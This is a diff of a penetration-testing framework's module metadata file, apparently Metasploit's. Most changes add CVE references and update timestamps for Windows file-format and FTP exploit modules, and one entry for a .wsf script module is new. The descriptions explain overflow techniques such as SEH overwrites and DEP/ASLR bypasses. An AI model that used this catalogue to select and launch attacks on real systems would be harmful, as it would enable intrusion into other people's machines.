    "description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n          When opening a malicious pls file with the Digital Music Pad,\n          a remote attacker could overflow a buffer and execute\n          arbitrary code.",
    "references": [
+      "CVE-2010-20111",
      "OSVDB-68178",
      "URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519",
      "EDB-15134"
@@ -159162,7 +160384,7 @@
    "targets": [
      "Windows XP SP2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/digital_music_pad_pls",
@@ -159286,7 +160508,9 @@
      "metacom27 <metacom27@gmail.com>"
    ],
    "description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n          appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit\n          this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n          user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.",
-    "references": [],
+    "references": [
+      "CVE-2020-7374"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
@@ -159296,7 +160520,7 @@
      "Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10",
      "Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner",
@@ -159899,6 +161123,7 @@
    ],
    "description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n          version 4.2. The createDataObject() Javascript API function allows for writing\n          arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n          Note: This exploit uses the All Users directory currently, which required\n          administrator privileges to write to. This means an administrative user has to\n          open the file to be successful. Kind of lame but thats how it goes sometimes in\n          the world of file write bugs.",
    "references": [
+      "CVE-2011-10030",
      "OSVDB-71104",
      "URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html"
    ],
@@ -159912,7 +161137,7 @@
      "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
      "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_reader_filewrite",
@@ -160046,6 +161271,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n          4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n          contains an overly long string in the Title field. This results in overwriting a\n          structured exception handler record.\n\n          NOTE: This exploit does not use javascript.",
    "references": [
+      "CVE-2010-20010",
      "OSVDB-68648",
      "EDB-15532",
      "URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/"
@@ -160058,7 +161284,7 @@
    "targets": [
      "Foxit Reader v4.1.1 XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/foxit_title_bof",
@@ -160141,6 +161367,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n          by creating a specially crafted galan file.",
    "references": [
+      "CVE-2009-20004",
      "OSVDB-60897",
      "EDB-10339"
    ],
@@ -160152,7 +161379,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/galan_fileformat_bof",
@@ -160278,6 +161505,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n          This buffer overflow occurs when the application attempts to open a malformed\n          server.cfg file.  To exploit this vulnerability, an attacker must send the\n          victim a server.cfg file and have them run samp-server.exe.",
    "references": [
+      "CVE-2011-10014",
      "OSVDB-83433",
      "EDB-17893"
    ],
@@ -160289,7 +161517,7 @@
    "targets": [
      "GTA SA-MP (samp-server) v0.3.1.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/gta_samp.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/gta_samp",
@@ -160466,6 +161694,7 @@
    ],
    "description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n          Heroes of Might and Magic III. Once the map is started in-game, a\n          buffer overflow occurring when loading object sprite names leads to\n          shellcode execution.",
    "references": [
+      "CVE-2025-34124",
      "EDB-37716"
    ],
    "platform": "Windows",
@@ -160478,7 +161707,7 @@
      "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
      "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/homm3_h3m",
@@ -160752,6 +161981,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow vulnerability in\n          i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n          By persuading the victim to place a specially-crafted Schedule.xml file\n          in the i-FTP folder, a remote attacker could execute arbitrary code on\n          the system or cause the application to crash. This module has been\n          tested successfully on Windows XP SP3.",
    "references": [
+      "CVE-2014-125114",
      "EDB-35177",
      "OSVDB-114279"
    ],
@@ -160763,7 +161993,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/iftp_schedule_bof",
@@ -160845,6 +162075,7 @@
    ],
    "description": "This module exploits a vulnerability found in ispVM System 18.0.2.  Due to the way\n          ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n          crafted file, when a long value is supplied for the version attribute of the ispXCF\n          tag. It results in arbitrary code execution under the context of the user.",
    "references": [
+      "CVE-2012-10057",
      "OSVDB-82000",
      "BID-53562",
      "URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/"
@@ -160857,7 +162088,7 @@
    "targets": [
      "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ispvm_xcf_ispxcf",
@@ -161037,6 +162268,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n          When opening a specially crafted arrangement file (.mmm) in the application, an\n          unsafe strcpy() will allow you to overwrite a SEH handler.  This exploit\n          bypasses DEP & ASLR, and works on XP, Vista & Windows 7.  Egghunter is used, and\n          might require up to several seconds to receive a shell.",
    "references": [
+      "CVE-2011-10021",
      "OSVDB-72063",
      "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002"
    ],
@@ -161048,7 +162280,7 @@
    "targets": [
      "Windows Universal DEP & ASLR Bypass"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/magix_musikmaker_16_mmm",
@@ -161357,6 +162589,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n          An attacker must send the file to victim and the victim must open the file.\n          Alternatively it may be possible to execute code remotely via an embedded\n          PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n          This functionality has not been tested in this module.",
    "references": [
+      "CVE-2009-20002",
      "OSVDB-56574",
      "EDB-9618",
      "EDB-10240"
@@ -161369,7 +162602,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/millenium_mp3_pls",
@@ -161451,6 +162684,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n          When opening a malicious s3m file in this application, a stack buffer overflow can be\n          triggered, resulting in arbitrary code execution.\n          This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
    "references": [
+      "CVE-2011-10024",
      "OSVDB-72101",
      "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004"
    ],
@@ -161462,7 +162696,7 @@
    "targets": [
      "Windows Universal Generic DEP & ASLR Bypass"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mjm_coreplayer2011_s3m",
@@ -161496,6 +162730,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n          and QuickPlayer 2010 (Multi-target exploit).  When opening a malicious s3m file in\n          one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n          arbitrary code execution.\n\n          This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
    "references": [
+      "CVE-2011-10023",
      "OSVDB-72102",
      "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003"
    ],
@@ -161507,7 +162742,7 @@
    "targets": [
      "Windows Universal Generic DEP & ASLR Bypass"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mjm_quickplayer_s3m",
@@ -161586,6 +162821,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow vulnerability in\n          MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n          By persuading the victim to open a specially-crafted .M3U file, specifically by\n          drag-and-dropping it to the player, a remote attacker can execute arbitrary\n          code on the system.",
    "references": [
+      "CVE-2011-10008",
      "BID-46926",
      "EDB-17013",
      "URL-http://www.mplayer-ww.com/eng/"
@@ -161598,7 +162834,7 @@
    "targets": [
      "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mplayer_m3u_bof",
@@ -161632,6 +162868,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow found in the handling\n          of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n          targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n          The overflow is triggered when an unsuspecting victim opens a movie file first,\n          followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n          be done from the console with the MPlayer \"-sub\" option.",
    "references": [
+      "CVE-2011-3625",
      "BID-49149",
      "OSVDB-74604",
      "URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf"
@@ -161644,7 +162881,7 @@
    "targets": [
      "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mplayer_sami_bof",
@@ -162564,6 +163801,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n          the application is used to open a specially crafted m3u file, a buffer overflow occurs\n          allowing arbitrary code execution.",
    "references": [
+      "CVE-2010-20123",
      "OSVDB-64580",
      "EDB-11791"
    ],
@@ -162577,7 +163815,7 @@
      "Windows Universal (SEH)",
      "Windows XP SP3 French"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mymp3player_m3u",
@@ -162610,6 +163848,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n          When opening a .dws file containing a specially crafted string longer then 520\n          characters will allow an attacker to execute arbitrary code.",
    "references": [
+      "CVE-2011-10012",
      "OSVDB-72291",
      "EDB-17223"
    ],
@@ -162621,7 +163860,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/netop.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/netop",
@@ -163258,6 +164497,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n          v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n          crafted \"load\" file to victim, who must store it in the installation directory. The\n          vulnerability will be triggered the next time ProShow is opened. The module has been\n          tested successfully on Windows XP SP3 and Windows 7 SP1.",
    "references": [
+      "CVE-2012-10051",
      "OSVDB-83745",
      "EDB-19563",
      "EDB-20036",
@@ -163271,7 +164511,7 @@
    "targets": [
      "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/proshow_load_bof",
@@ -163351,6 +164591,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow vulnerability in\n          version 7.5.1 86 of Real Networks Netzip Classic.\n          In order for the command to be executed, an attacker must convince someone to\n          load a specially crafted zip file with NetZip Classic.\n          By doing so, an attacker can execute arbitrary code as the victim user.",
    "references": [
+      "CVE-2011-10016",
      "OSVDB-83436",
      "EDB-16083",
      "BID-46059",
@@ -163365,7 +164606,7 @@
      "Windows XP SP3",
      "Windows 7/Windows Vista"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/real_networks_netzip_bof",
@@ -163679,6 +164920,7 @@
    ],
    "description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n          The vulnerability appears when we use Convert PDF to Image and use a specially\n          crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n          Win 8, Win 10.",
    "references": [
+      "CVE-2025-34106",
      "EDB-37760"
    ],
    "platform": "Windows",
@@ -163689,7 +164931,7 @@
    "targets": [
      "<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/shaper_pdf_bof",
@@ -163723,6 +164965,7 @@
    ],
    "description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n          the application is used to import a specially crafted m3u file, a buffer overflow occurs\n          allowing arbitrary code execution.",
    "references": [
+      "CVE-2012-10053",
      "OSVDB-64368",
      "EDB-11219"
    ],
@@ -163734,7 +164977,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/somplplayer_m3u",
@@ -163768,6 +165011,7 @@
    ],
    "description": "This module exploits a vulnerability found in Subtitle Processor 7.  By\n          supplying a long string of data as a .m3u file, Subtitle Processor first converts\n          this input in Unicode, which expands the string size, and then attempts to copy it\n          inline on the stack.  This results a buffer overflow with SEH overwritten, allowing\n          arbitrary code execution.",
    "references": [
+      "CVE-2011-10025",
      "OSVDB-72050",
      "EDB-17217",
      "URL-http://sourceforge.net/projects/subtitleproc/"
@@ -163780,7 +165024,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/subtitle_processor_m3u_bof",
@@ -163957,6 +165201,7 @@
    ],
    "description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n          occurs opening malformed Settings.ini file e.g. \"C:\\Program Files\\Total Video Player\\\".\n          This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.",
    "references": [
+      "CVE-2009-0261",
      "OSVDB-100619",
      "EDB-29799"
    ],
@@ -163968,7 +165213,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/total_video_player_ini_bof",
@@ -164241,6 +165486,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n          An attacker must send the file to victim and the victim must open the file.",
    "references": [
+      "CVE-2010-20114",
      "OSVDB-63067",
      "BID-38815",
      "EDB-11789"
@@ -164253,7 +165499,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/varicad_dwb",
@@ -164288,6 +165534,7 @@
    ],
    "description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n          processing a specially crafted .VSC file. This vulnerability could be\n          exploited by a remote attacker to execute arbitrary code on the target\n          machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.",
    "references": [
+      "CVE-2025-34123",
      "OSVDB-69616",
      "EDB-29234"
    ],
@@ -164299,7 +165546,7 @@
    "targets": [
      "VideoCharge Studio 2.12.3.685"
    ],
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/videocharge_studio.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/videocharge_studio",
@@ -164754,6 +166001,7 @@
    ],
    "description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When\n          the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n          for the execution of arbitrary code.",
    "references": [
+      "CVE-2009-0182",
      "OSVDB-64581",
      "BID-33960"
    ],
@@ -164765,7 +166013,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_cue",
@@ -165035,7 +166283,7 @@
    "targets": [
      "Microsoft Windows 98 or newer"
    ],
-    "mod_time": "2025-07-25 18:46:47 +0000",
+    "mod_time": "2025-09-26 03:06:37 +0000",
    "path": "/modules/exploits/windows/fileformat/windows_script_host_vbscript.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/windows_script_host_vbscript",
@@ -165056,6 +166304,49 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/windows_script_host_wsf": {
+    "name": "Malicious Windows Script Host Script File (.wsf)",
+    "fullname": "exploit/windows/fileformat/windows_script_host_wsf",
+    "aliases": [],
+    "rank": 500,
+    "disclosure_date": "1998-06-25",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module creates a Windows Script Host (WSH) Windows Script File (.wsf).",
+    "references": [
+      "ATT&CK-T1204.002"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Microsoft Windows 98 or newer"
+    ],
+    "mod_time": "2025-10-05 20:16:00 +0000",
+    "path": "/modules/exploits/windows/fileformat/windows_script_host_wsf.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/windows_script_host_wsf",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/winrar_ace": {
    "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution",
    "fullname": "exploit/windows/fileformat/winrar_ace",
@@ -165164,6 +166455,7 @@
    ],
    "description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n          when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n          the central directory, but the file names used to extract and open contents come from the\n          Local File Header. This inconsistency allows to spoof file names when opening ZIP files\n          with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n          March 2014",
    "references": [
+      "CVE-2014-125119",
      "OSVDB-62610",
      "BID-66383",
      "URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html",
@@ -165177,7 +166469,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/winrar_name_spoofing",
@@ -165308,6 +166600,7 @@
    ],
    "description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n          the application is used to import a specially crafted m3u file, a buffer overflow occurs\n          allowing arbitrary code execution.",
    "references": [
+      "CVE-2010-10017",
      "OSVDB-66911",
      "EDB-14497"
    ],
@@ -165319,7 +166612,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/wm_downloader_m3u",
@@ -165462,6 +166755,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Xenorate 2.50\n          by creating a specially crafted xpl file.",
    "references": [
+      "CVE-2009-20003",
      "OSVDB-57162",
      "EDB-10371"
    ],
@@ -165473,7 +166767,7 @@
    "targets": [
      "Windows XP SP2 / SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xenorate_xpl_bof",
@@ -165510,6 +166804,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n          1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n          contains an overly long string. This results in overwriting a\n          structured exception handler record.",
    "references": [
+      "CVE-2010-20042",
      "OSVDB-66912",
      "EDB-14517",
      "EDB-14633",
@@ -165523,7 +166818,7 @@
    "targets": [
      "Xion Audio Player v1.0.126 XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xion_m3u_sehbof",
@@ -165808,6 +167103,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n          download a file that has an overly long filename.",
    "references": [
+      "CVE-2009-1675",
      "OSVDB-68703",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
    ],
@@ -165819,7 +167115,7 @@
    "targets": [
      "XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/32bitftp_list_reply",
@@ -165909,6 +167205,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n          processing the response on a LIST command. During the overflow, a structured exception\n          handler record gets overwritten.",
    "references": [
+      "CVE-2019-5619",
      "OSVDB-68701",
      "EDB-16738",
      "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
@@ -165921,7 +167218,7 @@
    "targets": [
      "XP SP3 Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/aasync_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/aasync_list_reply",
@@ -166209,6 +167506,7 @@
    ],
    "description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n          crafted format string specifier as a username. The crafted username is sent to the server to\n          overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer\n          is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n          The SEH exit function is preferred so that the administrators are not left with an unhandled\n          exception message. When using the meterpreter payload, the process will never die, allowing\n          for continuous exploitation.",
    "references": [
+      "CVE-2012-10055",
      "OSVDB-82798",
      "EDB-19024"
    ],
@@ -166222,7 +167520,7 @@
      "Windows XP SP3 - English",
      "Windows Server 2003 - English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/comsnd_ftpd_fmtstr",
@@ -166353,6 +167651,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n          and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n          leads to a stack based buffer overflow.  EasyFTP allows anonymous access by\n          default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n          After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n          This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n          This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n          'fixing' the return address post-exploitation.  See references for more information.",
    "references": [
+      "CVE-2010-20121",
      "OSVDB-62134",
      "BID-38262",
      "URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/",
@@ -166381,7 +167680,7 @@
      "Windows Universal - v1.7.0.10",
      "Windows Universal - v1.7.0.11"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/easyftp_cwd_fixret",
@@ -166416,6 +167715,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n          credit goes to Karn Ganeshan.\n\n          NOTE: Although, this is likely to exploit the same vulnerability as the\n          'easyftp_cwd_fixret' exploit, it uses a slightly different vector.",
    "references": [
+      "CVE-2024-0546",
      "OSVDB-62134",
      "EDB-14400",
      "EDB-14451"
@@ -166433,7 +167733,7 @@
    "targets": [
      "Windows XP SP3 - Version 2002"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/easyftp_list_fixret",
@@ -166467,6 +167767,7 @@
    ],
    "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n          and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n          leads to a stack based buffer overflow.\n\n          NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n          'MKD' command, you must have access to an account that can create directories.\n\n          After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n          This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n          This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n          'fixing' the return address post-exploitation.  See references for more information.",
    "references": [
+      "CVE-2011-10005",
      "OSVDB-62134",
      "EDB-12044",
      "EDB-14399"
@@ -166493,7 +167794,7 @@
      "Windows Universal - v1.7.0.10",
      "Windows Universal - v1.7.0.11"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb",
    "is_install_path": true,
